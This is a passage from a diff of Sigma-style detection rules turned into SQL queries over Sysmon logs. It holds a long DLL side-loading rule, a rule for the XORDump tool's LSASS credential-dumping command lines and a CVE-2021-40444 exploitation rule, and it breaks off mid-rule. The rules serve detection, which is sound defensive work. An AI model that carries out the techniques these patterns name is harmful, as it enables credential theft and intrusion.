ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ "attack.execution", "attack.t1059" @@ -5770,34 +5598,40 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 